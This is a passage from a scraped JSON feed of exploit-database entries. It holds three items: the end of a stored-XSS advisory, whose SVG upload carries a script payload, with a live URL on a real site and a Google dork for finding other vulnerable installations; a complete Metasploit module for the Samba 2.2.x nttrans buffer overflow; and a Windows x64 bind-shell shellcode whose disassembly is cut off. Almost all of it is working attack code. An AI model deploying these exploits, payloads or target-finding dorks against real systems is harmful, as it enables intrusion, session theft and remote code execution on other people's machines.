0 30 0 0 110 0 110 -30 0 -30 0 0 -110z\"/>\r\n <path d=\"M2525 1750 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m45 66 c0 -23 -16 -27 -17 -5 -1 10 2 19 8 19 5 0 9 -6 9 -14z m101 -3 c5 -97 5 -134 -2 -145 -5 -8 -9 17 -9 59 0 39 -3 78 -6 87 -3 9 -1 16 5 16 6 0 11 -8 12 -17z m-29 -72 c2 -52 0 -67 -9 -60 -6 6 -20 9 -30 7 -16 -3 -18 
5 -21 60 l-3 62 30 0 29 0 4 -69z m-85 -23 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m20 -44 c2 -6 -3 -11 -12 -11 -8 0 -15 7 -15 15 0 15 22 12 27 -4z\"/>\r\n <path d=\"M2800 1751 c0 -108 0 -109 25 -113 13 -3 27 -3 30 0 3 3 5 54 5 114 l0 108 -30 0 -30 0 0 -109z m40 -11 c0 -33 -4 -60 -9 -60 -9 0 -14 98 -5 112 11 17 14 6 14 -52z\"/>\r\n <path d=\"M641 1634 c0 -11 3 -14 6 -6 3 7 2 16 -1 19 -3 4 -6 -2 -5 -13z\"/>\r\n <path d=\"M129 1507 c0 -1 -1 -53 -2 -115 l-2 -112 28 0 27 0 0 105 c0 58 1 108 3 111 1 4 -10 8 -25 10 -16 1 -28 2 -29 1z m28 -99 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z\"/>\r\n <path d=\"M290 1505 c-1 0 -2 -51 -3 -113 l-2 -112 88 0 88 0 -3 111 -3 111 -83 1 c-45 1 -82 2 -82 2z m142 -47 c5 -76 3 -144 -7 -150 -16 -12 -35 -9 -32 5 1 7 -10 13 -26 15 -28 3 -28 4 -25 65 3 59 4 62 31 64 l27 2 0 -70 c0 -44 4 -69 11 -69 8 0 10 26 7 80 -2 44 0 80 4 80 5 0 9 -10 10 -22z m-109 -3 c-3 -9 -8 -14 -10 -11 -3 3 -2 9 2 15 9 16 15 13 8 -4z m10 -144 c10 -11 9 -13 -3 -9 -17 5 -28 59 -20 103 4 22 6 16 8 -25 2 -30 9 -61 15 -69z\"/>\r\n <path d=\"M2510 1505 c0 0 -1 -51 -3 -113 l-2 -112 30 0 31 0 -2 112 -3 111 -25 2 c-14 0 -26 1 -26 0z m32 -102 c-5 -83 -9 -90 -11 -20 0 37 2 67 7 67 4 0 6 -21 4 -47z\"/>\r\n <path d=\"M2689 1500 c0 -3 -1 -53 -2 -112 l-2 -108 88 0 88 0 -3 111 -3 111\r\n -83 1 c-45 1 -82 0 -83 -3z m42 -43 c-6 -6 -11 -35 -11 -64 0 -29 -3 -53 -7\r\n -53 -8 0 -6 104 2 128 3 7 10 10 16 7 8 -5 8 -10 0 -18z m93 7 c5 -14 4 -15\r\n -9 -4 -17 14 -19 20 -6 20 5 0 12 -7 15 -16z m-21 -16 c-2 -5 -3 -33 -3 -63 0\r\n -54 0 -55 -30 -55 -30 0 -30 0 -30 58 0 32 2 61 5 63 7 8 60 5 58 -3z m37 -74\r\n c0 -41 -4 -63 -10 -59 -5 3 -10 1 -10 -4 0 -6 -7 -11 -17 -11 -15 0 -15 1 0\r\n 18 11 12 17 36 17 70 0 29 5 52 10 52 6 0 10 -29 10 -66z m-103 -70 c-9 -9\r\n -28 6 -21 18 4 6 10 6 17 -1 6 -6 8 -13 4 -17z\"/>\r\n <path d=\"M2080 1459 c0 -5 5 -7 10 -4 6 3 10 8 10 11 0 2 -4 4 -10 4 -5 0 -10\r\n -5 -10 -11z\"/>\r\n <path d=\"M129 1110 c-1 -3 -2 -53 -3 -112 l-1 -108 87 0 88 0 0 113 
0 112 -85\r\n 0 c-47 0 -86 -2 -86 -5z m42 -34 c-5 -6 -11 -29 -14 -51 -4 -34 -4 -33 -4 11\r\n 0 35 4 51 14 51 8 0 9 -4 4 -11z m98 -3 c0 -11 -3 -13 -6 -5 -11 28 -23 -3\r\n -23 -64 l0 -64 -30 0 -31 0 3 63 c3 58 5 62 26 60 13 -2 25 4 28 12 8 21 34\r\n 19 33 -2z m8 -55 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z m0 -50\r\n c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m-107 -41 c0 -18 -2 -19\r\n -10 -7 -13 20 -13 43 0 35 6 -3 10 -16 10 -28z m103 3 c-3 -12 -8 -19 -11 -16\r\n -5 6 5 36 12 36 2 0 2 -9 -1 -20z\"/>\r\n <path d=\"M420 1004 l0 -114 30 0 30 0 0 113 0 114 -30 1 -30 1 0 -115z\"/>\r\n <path d=\"M600 1115 c-1 0 -2 -51 -3 -113 l-2 -112 88 0 88 0 -3 111 -3 111\r\n -83 1 c-45 1 -82 2 -82 2z m42 -43 c-7 -2 -12 -16 -13 -30 0 -15 -3 -21 -6\r\n -14 -8 21 6 64 19 56 9 -6 9 -9 0 -12z m95 3 c0 -8 -4 -12 -9 -9 -4 3 -8 9 -8\r\n 15 0 5 4 9 8 9 5 0 9 -7 9 -15z m-27 -70 l0 -65 -30 0 c-30 0 -30 0 -30 58 0\r\n 65 3 72 37 72 22 0 23 -4 23 -65z m-48 -85 c23 -9 23 -9 -3 -9 -27 -1 -40 15\r\n -38 47 0 12 3 10 9 -6 5 -12 20 -27 32 -32z m88 6 c0 -17 -2 -18 -10 -6 -7 11\r\n -10 11 -10 2 0 -7 -4 -11 -10 -7 -13 8 -2 32 15 32 9 0 15 -10 15 -21z\"/>\r\n <path d=\"M884 1111 c-2 -2 -4 -53 -4 -113 l0 -108 33 0 32 0 -3 114 -3 114\r\n -25 -2 c-14 0 -28 -3 -30 -5z m23 -53 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7\r\n 2 -19 0 -25z m13 -78 c0 -5 -4 -10 -10 -10 -5 0 -10 5 -10 10 0 6 5 10 10 10\r\n 6 0 10 -4 10 -10z\"/>\r\n <path d=\"M2020 1111 c-24 -5 -34 -11 -32 -21 2 -8 1 -12 -3 -8 -4 4 -25 -3\r\n -46 -14 -38 -20 -39 -21 -39 -77 0 -31 -3 -66 -6 -78 -6 -23 -5 -23 85 -23\r\n l91 0 0 115 c0 63 -3 114 -7 114 -5 -1 -24 -5 -43 -8z m29 -58 c-1 -17 -3 -21\r\n -6 -10 -2 9 -9 17 -14 17 -5 0 -9 5 -9 10 0 6 7 10 15 10 10 0 15 -9 14 -27z\r\n m-39 -48 l0 -65 -30 0 c-30 0 -30 0 -30 58 0 65 3 72 37 72 22 0 23 -4 23 -65z\r\n m-83 30 c0 -8 -4 -15 -9 -15 -10 0 -11 14 -1 23 9 10 10 9 10 -8z m16 -92 c4\r\n -19 2 -33 -3 -33 -6 0 -10 1 -10 3 -10 64 -10 81 -2 72 5 -5 12 -25 15 -42z\r\n m101 15 c-4 -13 -7 -29 -7 
-35 0 -7 -6 -13 -12 -13 -9 0 -9 9 -1 35 6 19 15\r\n 35 19 35 5 0 5 -10 1 -22z\"/>\r\n <path d=\"M2210 1003 l0 -113 88 0 87 0 0 111 0 110 -88 2 -87 2 0 -112z m59\r\n 75 c6 -7 22 -13 34 -13 20 0 22 -6 25 -62 l3 -63 -31 0 -30 0 0 59 c0 36 -5\r\n 63 -13 69 -20 17 -10 -118 11 -140 9 -11 11 -18 4 -18 -19 0 -30 33 -32 100\r\n -1 36 -2 68 -1 73 2 11 15 9 30 -5z m90 -53 c-1 -77 -11 -110 -32 -111 -10 -1\r\n -12 0 -3 3 27 8 36 131 11 157 -14 13 -13 15 5 13 18 -1 20 -8 19 -62z\"/>\r\n <path d=\"M2530 1115 c0 0 -1 -51 -3 -113 l-2 -112 88 0 87 0 0 113 0 112 -85\r\n 0 c-47 0 -85 0 -85 0z m33 -67 c-7 -59 -13 -61 -13 -5 0 26 4 47 9 47 4 0 6\r\n -19 4 -42z m110 21 c-4 -15 -8 -17 -14 -8 -8 14 -3 29 11 29 4 0 6 -9 3 -21z\r\n m-33 -66 c0 -63 0 -63 -29 -63 -28 0 -29 1 -30 57 0 67 1 69 33 69 25 0 26 -2\r\n 26 -63z m34 -21 c-2 -67 -3 -72 -15 -72 -5 0 -7 5 -3 12 4 6 6 29 6 51 -2 33\r\n 3 57 11 57 1 0 1 -21 1 -48z\"/>\r\n <path d=\"M2800 1003 l0 -113 30 0 30 0 0 113 0 114 -30 0 -30 0 0 -114z m39\r\n 10 c-1 -67 -2 -67 -10 -23 -11 63 -11 90 1 90 6 0 9 -28 9 -67z\"/>\r\n <path d=\"M1870 1080 c-66 -23 -63 -23 -54 -8 4 7 3 8 -5 4 -6 -4 -9 -11 -6\r\n -15 7 -13 -65 -58 -112 -70 -23 -7 -67 -25 -98 -41 -58 -31 -95 -38 -95 -19 0\r\n 5 -4 8 -9 5 -5 -4 -22 -1 -38 5 -15 6 -40 12 -55 14 -15 2 -38 11 -52 20 -27\r\n 18 -98 33 -81 17 6 -5 36 -19 67 -32 32 -12 55 -26 52 -31 -3 -5 1 -6 9 -3 8\r\n 3 42 -4 75 -15 74 -25 109 -27 114 -5 2 9 37 30 87 50 47 19 85 33 86 31 1 -1\r\n -2 -15 -6 -32 -4 -16 -7 -22 -8 -12 -2 31 -26 13 -29 -21 -3 -30 -1 -32 27\r\n -32 31 0 31 0 32 58 l0 57 70 35 c39 19 75 41 81 47 13 16 14 16 -52 -7z\"/>\r\n <path d=\"M1180 770 c0 -5 5 -10 11 -10 5 0 7 5 4 10 -3 6 -8 10 -11 10 -2 0\r\n -4 -4 -4 -10z\"/>\r\n <path d=\"M150 634 c0 -74 4 -113 10 -109 6 3 10 26 10 50 0 44 0 44 33 39 46\r\n -7 97 26 97 63 0 50 -33 73 -104 73 l-46 0 0 -116z m111 86 c26 -14 24 -55 -3\r\n -74 -12 -9 -37 -16 -55 -16 -33 0 -33 0 -33 50 l0 50 36 0 c19 0 44 -5 55 -10z\"/>\r\n <path d=\"M562 638 c2 -69 7 -112 13 -110 6 
1 10 24 10 50 0 44 2 47 24 44 13\r\n -2 44 -26 69 -53 24 -27 48 -46 53 -43 5 3 -11 26 -36 52 l-44 46 29 12 c44\r\n 19 51 61 16 91 -21 18 -39 23 -82 23 l-54 0 2 -112z m122 76 c21 -20 20 -30\r\n -4 -54 -13 -13 -33 -20 -60 -20 l-40 0 0 45 0 45 44 0 c27 0 51 -6 60 -16z\"/>\r\n <path d=\"M1023 729 c-57 -36 -67 -123 -20 -166 53 -49 105 -56 158 -20 44 29\r\n 62 81 47 131 -22 70 -118 98 -185 55z m142 -25 c38 -41 31 -116 -14 -151 -29\r\n -22 -95 -16 -125 12 -36 34 -37 105 -1 140 35 36 106 35 140 -1z\"/>\r\n <path d=\"M1521 658 c-1 -50 -7 -98 -13 -105 -6 -7 -26 -13 -45 -13 -20 0 -32\r\n -4 -28 -10 10 -17 60 -11 82 10 13 11 24 38 28 62 8 58 2 141 -12 145 -7 3\r\n -11 -27 -12 -89z\"/>\r\n <path d=\"M1830 645 c0 -58 -1 -108 -2 -112 -2 -5 32 -9 75 -11 48 -2 77 1 77\r\n 8 0 6 -27 10 -65 10 l-65 0 0 45 0 45 55 0 c30 0 55 5 55 10 0 6 -25 10 -55\r\n 10 l-55 0 0 40 0 40 65 0 c37 0 65 4 65 10 0 6 -32 10 -75 10 l-75 0 0 -105z\"/>\r\n <path d=\"M2278 734 c-32 -17 -58 -62 -58 -100 0 -61 59 -114 127 -114 29 0 83\r\n 26 83 40 0 15 -16 12 -30 -5 -15 -18 -82 -20 -112 -4 -11 6 -26 26 -34 46 -30\r\n 72 12 133 92 133 23 0 46 -4 49 -10 7 -12 35 -13 35 -2 0 30 -107 41 -152 16z\"/>\r\n <path d=\"M2660 740 c0 -5 21 -10 46 -10 l45 0 -2 -102 c-1 -69 2 -103 10 -106\r\n 8 -3 11 28 11 102 l0 106 45 0 c25 0 45 5 45 10 0 6 -40 10 -100 10 -60 0\r\n -100 -4 -100 -10z\"/>\r\n <path d=\"M481 504 c0 -11 3 -14 6 -6 3 7 2 16 -1 19 -3 4 -6 -2 -5 -13z\"/>\r\n <path d=\"M2805 381 c-24 -5 -35 -17 -57 -59 l-27 -53 -27 55 c-25 52 -30 56\r\n -62 56 l-34 0 48 -67 c40 -56 48 -75 49 -113 0 -43 1 -45 30 -45 29 0 30 1 27\r\n 43 -3 37 2 50 47 112 28 38 47 71 43 73 -4 2 -20 1 -37 -2z m-78 -163 c-3 -8\r\n -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M157 268 l2 -113 28 0 28 1 3 112 3 112 -33 0 -33 0 2 -112z\"/>\r\n <path d=\"M340 266 l0 -113 25 0 c24 0 25 2 25 62 0 43 -5 66 -15 75 -18 15\r\n -16 57 2 57 15 0 17 -13 3 -22 -5 -3 -7 -12 -3 -21 3 -8 8 -13 10 -10 3 2 27\r\n -21 55 -52 70 -79 70 -79 96 -87 22 -6 22 
-6 22 109 l0 116 -25 0 c-24 0 -25\r\n -2 -25 -64 0 -53 3 -65 18 -69 14 -4 14 -5 -3 -6 -13 0 -41 24 -80 68 -40 46\r\n -68 70 -82 70 -23 1 -23 -1 -23 -113z m65 54 c-3 -5 -12 -10 -18 -10 -7 0 -6\r\n 4 3 10 19 12 23 12 15 0z m115 -115 c0 -8 -2 -15 -4 -15 -2 0 -6 7 -10 15 -3\r\n 8 -1 15 4 15 6 0 10 -7 10 -15z\"/>\r\n <path d=\"M696 355 c-30 -27 -29 -26 -17 -58 7 -17 25 -30 60 -43 54 -19 64\r\n -36 31 -54 -15 -8 -27 -7 -49 4 -26 14 -30 14 -45 -3 -15 -17 -14 -19 24 -36\r\n 52 -23 104 -12 134 28 19 26 19 30 6 54 -9 15 -33 32 -60 42 -27 10 -46 24\r\n -48 35 -3 15 3 17 49 14 43 -2 54 0 57 13 3 19 -24 29 -79 29 -25 0 -45 -8\r\n -63 -25z\"/>\r\n <path d=\"M950 268 l0 -113 82 2 c77 1 83 3 86 24 4 21 1 22 -52 16 l-56 -6 0\r\n 30 c0 28 2 29 44 29 40 0 44 2 39 21 -5 18 -11 19 -44 14 -38 -7 -39 -6 -39\r\n 24 0 31 0 31 55 31 48 0 55 2 55 20 0 18 -7 20 -85 20 l-85 0 0 -112z m37 60\r\n c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m9 -56 c-4 -26 -21 -24\r\n -22 2 -1 16 3 23 11 20 7 -3 12 -13 11 -22z\"/>\r\n <path d=\"M1260 365 c-46 -25 -67 -92 -44 -141 29 -61 103 -87 167 -60 60 24\r\n 44 54 -19 37 -68 -19 -115 29 -94 95 13 38 32 46 99 42 28 -2 45 1 48 9 11 30\r\n -110 44 -157 18z\"/>\r\n <path d=\"M1522 289 c3 -82 5 -92 28 -109 36 -28 83 -33 126 -15 55 23 63 39\r\n 64 133 l0 82 -30 0 -30 0 0 -78 c0 -85 -8 -102 -50 -102 -42 0 -50 17 -50 102\r\n l0 78 -31 0 -31 0 4 -91z m188 -69 c-6 -11 -13 -20 -16 -20 -2 0 0 9 6 20 6\r\n 11 13 20 16 20 2 0 0 -9 -6 -20z\"/>\r\n <path d=\"M1860 267 l0 -114 31 0 c30 0 31 1 27 44 -3 35 0 43 14 43 10 0 27\r\n -17 40 -39 17 -31 30 -40 57 -45 19 -3 37 -3 40 -1 2 3 -15 27 -37 54 -39 46\r\n -40 50 -22 56 26 8 40 36 33 64 -8 32 -54 51 -123 51 l-60 0 0 -113z m125 63\r\n c12 -20 -6 -47 -38 -57 l-32 -10 3 39 c4 34 7 38 32 38 16 0 32 -5 35 -10z\r\n m32 -12 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m-120 -70 c-3\r\n -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M2160 266 l0 -113 30 1 30 1 0 113 0 112 -30 0 -30 0 0 -114z m37\r\n -38 
c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M2320 360 c0 -17 7 -20 40 -20 l40 0 0 -93 0 -94 30 0 30 0 0 94 0\r\n 93 35 0 c28 0 35 4 35 20 0 19 -7 20 -105 20 -98 0 -105 -1 -105 -20z m110\r\n -35 c0 -5 -5 -3 -10 5 -5 8 -10 20 -10 25 0 6 5 3 10 -5 5 -8 10 -19 10 -25z\r\n m8 -56 c-3 -20 -5 -19 -9 9 -3 20 -2 29 4 23 5 -5 7 -19 5 -32z\"/>\r\n <path d=\"M818 123 c7 -3 16 -2 19 1 4 3 -2 6 -13 5 -11 0 -14 -3 -6 -6z\"/>\r\n </g>\r\n <script type=\"text/javascript\">\r\n alert(\"@insecurity\");\r\n </script>\r\n</svg>\r\n\r\n-------------------------------------------------------------------------------------------------------------\r\n\r\nHere is a live example: \r\n https://www.saltsidecreations.com/wp-content/uploads/fancy_products_uploads/2017/04/28/insecurity.svg\r\n\r\nThis could have a variety of impacts ranging from stealing cookies and regular XSS-related risks to a highly\r\neffective spear phishing campaign\r\n\r\nGoogle Dork: inurl:fancy_products_uploads\r\n\r\n-------------------------------------------------------------------------------------------------------------\r\n\r\nHow to fix: Use whitelist for file upload (e.g. only allow JPG and PNG, no .svg)\r\n\r\nThere's also multiple full path disclosure for this plugin but WP is riddled with FPD. 
If you're interested then \r\nget in touch (although im pretty sure there's tons of files in /wp-includes/ that will give you FPD anyway presuming no error_reporting(0) set)\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27710"}, {"lastseen": "2018-03-13T14:08:32", "references": [], "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "reporter": "metasploit", "published": "2017-03-23T00:00:00", "title": "Samba 2.2.2 < 2.2.6 - nttrans Buffer Overflow Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-13T14:08:32", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:C/", "value": 6.1}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1318"], "modified": "2017-03-23T00:00:00", "id": "1337DAY-ID-27398", "href": "https://0day.today/exploit/description/27398", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = AverageRanking\r\n \r\n include Msf::Exploit::Remote::SMB::Client\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow',\r\n 'Description' => %q{\r\n This module attempts to exploit a buffer overflow vulnerability present in\r\n versions 2.2.2 through 2.2.6 of Samba.\r\n The Samba developers report this as:\r\n \"Bug in the length checking for encrypted password change requests from clients.\"\r\n The bug was discovered and reported by the Debian Samba Maintainers.\r\n },\r\n 'Author' => [ 'hdm' ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2002-1318' ],\r\n [ 'OSVDB', '14525' ],\r\n [ 'BID', '6210' ],\r\n [ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'linux',\r\n 'Payload' =>\r\n {\r\n 
'Space' => 1024,\r\n 'BadChars' => \"\\x00\",\r\n 'MinNops' => 512,\r\n },\r\n 'Targets' =>\r\n [\r\n [ \"Samba 2.2.x Linux x86\",\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux',\r\n 'Rets' => [0x01020304, 0x41424344],\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Apr 7 2003'\r\n ))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(139)\r\n ], self.class)\r\n end\r\n \r\n def exploit\r\n \r\n # 0x081fc968\r\n \r\n pattern = Rex::Text.pattern_create(12000)\r\n \r\n pattern[532, 4] = [0x81b847c].pack('V')\r\n pattern[836, payload.encoded.length] = payload.encoded\r\n \r\n # 0x081b8138\r\n \r\n connect\r\n smb_login\r\n \r\n targ_address = 0xfffbb7d0\r\n \r\n #\r\n # Send a NTTrans request with ParameterCountTotal set to the buffer length\r\n #\r\n \r\n subcommand = 1\r\n param = ''\r\n body = ''\r\n setup_count = 0\r\n setup_data = ''\r\n data = param + body\r\n \r\n pkt = CONST::SMB_NTTRANS_PKT.make_struct\r\n self.simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n \r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n \r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0x2001\r\n pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count\r\n \r\n pkt['Payload'].v['ParamCountTotal'] =12000\r\n pkt['Payload'].v['DataCountTotal'] = body.length\r\n pkt['Payload'].v['ParamCountMax'] = 1024\r\n pkt['Payload'].v['DataCountMax'] = 65504\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Subcommand'] = subcommand\r\n \r\n pkt['Payload'].v['Payload'] = data\r\n \r\n self.simple.client.smb_send(pkt.to_s)\r\n ack = 
self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)\r\n \r\n #\r\n # Send a NTTrans secondary request with the magic displacement\r\n #\r\n \r\n param = pattern\r\n body = ''\r\n data = param + body\r\n \r\n pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct\r\n self.simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n \r\n base_offset = pkt.to_s.length - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n \r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0x2001\r\n pkt['Payload']['SMB'].v['WordCount'] = 18\r\n \r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.length\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['ParamDisplace'] = targ_address\r\n pkt['Payload'].v['DataCount'] = body.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n \r\n pkt['Payload'].v['Payload'] = data\r\n \r\n self.simple.client.smb_send(pkt.to_s)\r\n ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)\r\n \r\n \r\n handler\r\n \r\n end\r\n \r\nend\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/27398"}, {"lastseen": "2018-01-05T17:21:05", "references": [], "description": "Exploit for win64 platform in category shellcode", "edition": 1, "reporter": "Roziul Hasan Khan Shifat", "published": "2017-01-01T00:00:00", "title": "Windows/x64 - Password Protected Bind Shellcode (825 bytes)", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-05T17:21:05", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/", "value": 3.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-01-01T00:00:00", "id": "1337DAY-ID-26603", "href": 
"https://0day.today/exploit/description/26603", "sourceData": "/*\r\n \r\n # Title : Windows x64 Password Protected Bind Shell TCP shellcode\r\n # size : 825 bytes\r\n # Author : Roziul Hasan Khan Shifat\r\n # Tested On : Windows 7 x64 professional\r\n # Date : 01-01-2017 \r\n \r\n*/\r\n \r\n \r\n \r\n/*\r\n \r\n \r\n file format pe-x86-64\r\n \r\n \r\nDisassembly of section .text:\r\n \r\n0000000000000000 <_start>:\r\n 0: 99 cltd \r\n 1: b2 80 mov $0x80,%dl\r\n 3: 48 29 d4 sub %rdx,%rsp\r\n 6: 4c 8d 24 24 lea (%rsp),%r12\r\n a: 48 31 d2 xor %rdx,%rdx\r\n d: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax\r\n 12: 48 8b 40 18 mov 0x18(%rax),%rax\r\n 16: 48 8b 70 10 mov 0x10(%rax),%rsi\r\n 1a: 48 ad lods %ds:(%rsi),%rax\r\n 1c: 48 8b 30 mov (%rax),%rsi\r\n 1f: 48 8b 7e 30 mov 0x30(%rsi),%rdi\r\n 23: b2 88 mov $0x88,%dl\r\n 25: 8b 5f 3c mov 0x3c(%rdi),%ebx\r\n 28: 48 01 fb add %rdi,%rbx\r\n 2b: 8b 1c 13 mov (%rbx,%rdx,1),%ebx\r\n 2e: 48 01 fb add %rdi,%rbx\r\n 31: 8b 73 1c mov 0x1c(%rbx),%esi\r\n 34: 48 01 fe add %rdi,%rsi\r\n 37: 48 31 d2 xor %rdx,%rdx\r\n 3a: 41 c7 04 24 77 73 32 movl $0x5f327377,(%r12)\r\n 41: 5f \r\n 42: 66 41 c7 44 24 04 33 movw $0x3233,0x4(%r12)\r\n 49: 32 \r\n 4a: 41 88 54 24 06 mov %dl,0x6(%r12)\r\n 4f: 66 ba 40 03 mov $0x340,%dx\r\n 53: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 56: 48 01 fb add %rdi,%rbx\r\n 59: 49 8d 0c 24 lea (%r12),%rcx\r\n 5d: ff d3 callq *%rbx\r\n 5f: 49 89 c7 mov %rax,%r15\r\n 62: 48 31 d2 xor %rdx,%rdx\r\n 65: b2 88 mov $0x88,%dl\r\n 67: 41 8b 5f 3c mov 0x3c(%r15),%ebx\r\n 6b: 4c 01 fb add %r15,%rbx\r\n 6e: 8b 1c 13 mov (%rbx,%rdx,1),%ebx\r\n 71: 4c 01 fb add %r15,%rbx\r\n 74: 44 8b 73 1c mov 0x1c(%rbx),%r14d\r\n 78: 4d 01 fe add %r15,%r14\r\n 7b: 66 ba c8 01 mov $0x1c8,%dx\r\n 7f: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx\r\n 83: 4c 01 fb add %r15,%rbx\r\n 86: 48 31 c9 xor %rcx,%rcx\r\n 89: 66 b9 98 01 mov $0x198,%cx\r\n 8d: 48 29 cc sub %rcx,%rsp\r\n 90: 48 8d 14 24 lea (%rsp),%rdx\r\n 94: 66 b9 02 02 mov $0x202,%cx\r\n 98: ff d3 callq 
*%rbx\r\n 9a: 48 83 ec 58 sub $0x58,%rsp\r\n 9e: 48 83 ec 58 sub $0x58,%rsp\r\n a2: 48 31 d2 xor %rdx,%rdx\r\n a5: 66 ba 88 01 mov $0x188,%dx\r\n a9: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx\r\n ad: 4c 01 fb add %r15,%rbx\r\n b0: 6a 06 pushq $0x6\r\n b2: 6a 01 pushq $0x1\r\n b4: 6a 02 pushq $0x2\r\n b6: 59 pop %rcx\r\n b7: 5a pop %rdx\r\n b8: 41 58 pop %r8\r\n ba: 4d 31 c9 xor %r9,%r9\r\n bd: 4c 89 4c 24 20 mov %r9,0x20(%rsp)\r\n c2: 4c 89 4c 24 28 mov %r9,0x28(%rsp)\r\n c7: ff d3 callq *%rbx\r\n c9: 49 89 c5 mov %rax,%r13\r\n cc: 41 8b 5e 04 mov 0x4(%r14),%ebx\r\n d0: 4c 01 fb add %r15,%rbx\r\n d3: 6a 10 pushq $0x10\r\n d5: 41 58 pop %r8\r\n d7: 48 31 d2 xor %rdx,%rdx\r\n da: 49 89 14 24 mov %rdx,(%r12)\r\n de: 49 89 54 24 08 mov %rdx,0x8(%r12)\r\n e3: 41 c6 04 24 02 movb $0x2,(%r12)\r\n e8: 66 41 c7 44 24 02 09 movw $0xbd09,0x2(%r12)\r\n ef: bd \r\n f0: 49 8d 14 24 lea (%r12),%rdx\r\n f4: 4c 89 e9 mov %r13,%rcx\r\n f7: ff d3 callq *%rbx\r\n f9: 41 8b 5e 30 mov 0x30(%r14),%ebx\r\n fd: 4c 01 fb add %r15,%rbx\r\n 100: 6a 01 pushq $0x1\r\n 102: 5a pop %rdx\r\n 103: 4c 89 e9 mov %r13,%rcx\r\n 106: ff d3 callq *%rbx\r\n 108: 48 83 ec 58 sub $0x58,%rsp\r\n 10c: eb 12 jmp 120 <a>\r\n \r\n000000000000010e <kick>:\r\n 10e: 48 83 c4 58 add $0x58,%rsp\r\n 112: 41 8b 5e 08 mov 0x8(%r14),%ebx\r\n 116: 4c 01 fb add %r15,%rbx\r\n 119: 49 8b 4c 24 f8 mov -0x8(%r12),%rcx\r\n 11e: ff d3 callq *%rbx\r\n \r\n0000000000000120 <a>:\r\n 120: 41 8b 1e mov (%r14),%ebx\r\n 123: 4c 01 fb add %r15,%rbx\r\n 126: 48 31 d2 xor %rdx,%rdx\r\n 129: 49 89 14 24 mov %rdx,(%r12)\r\n 12d: 49 89 54 24 08 mov %rdx,0x8(%r12)\r\n 132: b2 10 mov $0x10,%dl\r\n 134: 52 push %rdx\r\n 135: 4c 8d 04 24 lea (%rsp),%r8\r\n 139: 49 8d 14 24 lea (%r12),%rdx\r\n 13d: 4c 89 e9 mov %r13,%rcx\r\n 140: ff d3 callq *%rbx\r\n 142: 49 89 44 24 f8 mov 